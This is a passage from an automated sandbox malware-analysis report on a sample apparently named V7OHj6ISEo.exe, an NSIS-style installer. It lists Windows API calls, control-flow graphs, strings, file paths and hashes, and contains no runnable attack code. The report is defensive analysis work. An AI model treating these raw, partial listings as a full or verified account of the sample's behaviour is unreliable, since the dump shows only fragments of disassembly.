                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 511 405afa-405b20 call 405dc5 514 405b22-405b34 DeleteFileW 511->514 515 405b39-405b40 511->515 518 405cb6-405cba 514->518 516 405b42-405b44 515->516 517 405b53-405b63 call 4063e8 515->517 519 405c64-405c69 516->519 520 405b4a-405b4d 516->520 524 405b72-405b73 call 405d09 517->524 525 405b65-405b70 lstrcatW 517->525 519->518 523 405c6b-405c6e 519->523 520->517 520->519 526 405c70-405c76 523->526 527 405c78-405c80 call 40672b 523->527 528 405b78-405b7c 524->528 525->528 526->518 527->518 535 405c82-405c96 call 405cbd call 405ab2 527->535 531 405b88-405b8e lstrcatW 528->531 532 405b7e-405b86 528->532 534 405b93-405baf lstrlenW FindFirstFileW 531->534 532->531 532->534 536 405bb5-405bbd 534->536 537 405c59-405c5d 534->537 551 405c98-405c9b 535->551 552 405cae-405cb1 call 405450 535->552 540 405bdd-405bf1 call 4063e8 536->540 541 405bbf-405bc7 536->541 537->519 539 405c5f 537->539 539->519 553 405bf3-405bfb 540->553 554 405c08-405c13 call 405ab2 540->554 545 405bc9-405bd1 541->545 546 405c3c-405c4c FindNextFileW 541->546 545->540 550 405bd3-405bdb 545->550 546->536 549 405c52-405c53 FindClose 546->549 549->537 550->540 550->546 551->526 555 405c9d-405cac call 405450 call 4061ae 551->555 552->518 553->546 556 405bfd-405c06 call 405afa 553->556 564 405c34-405c37 call 405450 554->564 565 405c15-405c18 554->565 555->518 556->546 564->546 568 405c1a-405c2a call 405450 call 4061ae 565->568 569 405c2c-405c32 565->569 568->546 569->546
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: "C:\Users\user\Desktop\V7OHj6ISEo.exe"$0WB$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                                                            • API String ID: 2035342205-928638858
                                                                                                            • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 264 404037-40404c 262->264 265 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->265 263->262 266 403eaa-403eb3 263->266 270 40408c-404091 call 4043ab 264->270 271 40404e-404051 264->271 265->264 267 403eb5-403ec2 SetWindowPos 266->267 268 403ec8-403ecb 266->268 267->268 272 403ee5-403eeb 268->272 273 403ecd-403edf ShowWindow 268->273 283 404096-4040b1 270->283 275 404053-40405e call 401389 271->275 276 404084-404086 271->276 278 403f07-403f0a 272->278 279 403eed-403f02 DestroyWindow 272->279 273->272 275->276 298 404060-40407f SendMessageW 275->298 276->270 282 40432c 276->282 289 403f0c-403f18 SetWindowLongW 278->289 290 403f1d-403f23 278->290 286 404309-40430f 279->286 288 40432e-404335 282->288 284 4040b3-4040b5 call 40140b 283->284 285 4040ba-4040c0 283->285 284->285 294 4040c6-4040d1 285->294 295 4042ea-404303 DestroyWindow EndDialog 285->295 286->282 293 404311-404317 286->293 289->288 296 403fc6-403fd4 call 4043c6 290->296 297 403f29-403f3a GetDlgItem 290->297 293->282 299 404319-404322 ShowWindow 293->299 294->295 300 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 294->300 295->286 296->288 301 403f59-403f5c 297->301 302 403f3c-403f53 SendMessageW IsWindowEnabled 297->302 298->288 299->282 331 404126-40412b 300->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 300->332 305 403f61-403f64 301->305 306 403f5e-403f5f 301->306 302->282 302->301 310 403f72-403f77 305->310 311 403f66-403f6c 305->311 309 403f8f-403f94 call 404338 306->309 309->296 312 403f79-403f7f 310->312 313 403fad-403fc0 SendMessageW 310->313 311->313 316 403f6e-403f70 311->316 317 403f81-403f87 call 40140b 312->317 318 403f96-403f9f call 40140b 312->318 313->296 316->309 327 403f8d 317->327 318->296 328 403fa1-403fab 318->328 327->309 328->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->283 351 4041ff-404201 340->351 351->283 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->286 356 404244-404271 CreateDialogParamW 353->356 354->282 355 404219-40421f 354->355 355->283 357 404225 355->357 356->286 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->286
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 3282139019-3251261122
                                                                                                            • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 379 403b5e-403b87 call 403dae call 405dc5 369->379 375 403b53-403b59 lstrcatW 370->375 376 403b3d-403b4e call 4062b6 370->376 375->379 376->375 384 403c19-403c21 call 405dc5 379->384 385 403b8d-403b92 379->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 387 403b98-403bb2 call 4062b6 385->387 390 403bb7-403bc0 387->390 390->384 393 403bc2-403bc6 390->393 391->392 395 403cd5-403cdd call 40140b 392->395 396 403c56-403c86 RegisterClassW 392->396 397 403bd8-403be4 lstrlenW 393->397 398 403bc8-403bd5 call 405cea 393->398 409 403ce7-403cf2 call 403dae 395->409 410 403cdf-403ce2 395->410 399 403da4 396->399 400 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 396->400 404 403be6-403bf4 lstrcmpiW 397->404 405 403c0c-403c14 call 405cbd call 4063e8 397->405 398->397 403 403da6-403dad 399->403 400->395 404->405 408 403bf6-403c00 GetFileAttributesW 404->408 405->384 412 403c02-403c04 408->412 413 403c06-403c07 call 405d09 408->413 419 403cf8-403d12 ShowWindow call 406752 409->419 420 403d7b-403d83 call 405523 409->420 410->403 412->405 412->413 413->405 425 403d14-403d19 call 406752 419->425 426 403d1e-403d30 GetClassInfoW 419->426 427 403d85-403d8b 420->427 428 403d9d-403d9f call 40140b 420->428 425->426 431 403d32-403d42 GetClassInfoW RegisterClassW 426->431 432 403d48-403d6b DialogBoxParamW call 40140b 426->432 427->410 433 403d91-403d98 call 40140b 427->433 428->399 431->432 437 403d70-403d79 call 403a28 432->437 433->410 437->403
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Iw,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Iw,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Iw), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: "C:\Users\user\Desktop\V7OHj6ISEo.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\Iw$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-2597900296
                                                                                                            • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 454 402fd7 453->454 455 402fd9-402fe6 call 403447 453->455 454->455 464 403143-40314b call 402e8e 455->464 465 402fec-402ff2 455->465 459->445 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 488 4030df-4030e5 462->488 490 403139-40313e 463->490 491 40314d-40317d call 40345d call 4031d6 463->491 464->459 468 403072-403076 465->468 469 402ff4-40300c call 405e99 465->469 473 403078-40307e call 402e8e 468->473 474 40307f-403085 468->474 469->474 487 40300e-403015 469->487 473->474 479 403087-403095 call 4068b5 474->479 480 403098-4030a2 474->480 479->480 480->452 480->453 487->474 492 403017-40301e 487->492 488->459 488->463 490->445 500 403182-403185 491->500 492->474 494 403020-403027 492->494 494->474 496 403029-403030 494->496 496->474 497 403032-403052 496->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->474 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->474 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\V7OHj6ISEo.exe,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\V7OHj6ISEo.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\V7OHj6ISEo.exe,C:\Users\user\Desktop\V7OHj6ISEo.exe,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: "C:\Users\user\Desktop\V7OHj6ISEo.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\V7OHj6ISEo.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-3415164459
                                                                                                            • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
